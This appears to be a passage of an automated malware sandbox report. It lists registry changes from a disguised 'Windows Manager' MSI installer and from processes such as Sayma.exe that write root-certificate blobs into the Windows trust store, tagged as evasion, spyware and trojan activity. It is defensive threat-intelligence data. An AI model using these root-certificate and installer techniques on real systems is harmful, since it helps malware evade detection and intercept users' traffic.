Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

msiexec.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\67BDC06	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe

Modifies system certificate store 2 TTPs 20 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Fri1008c7d6874.exeSayma.exeinstaller.exeFri10720d229511df563.exeany.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Fri1008c7d6874.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Fri1008c7d6874.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sayma.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sayma.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Fri1008c7d6874.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Fri1008c7d6874.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Fri1008c7d6874.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Fri1008c7d6874.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Fri1008c7d6874.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Fri1008c7d6874.exe
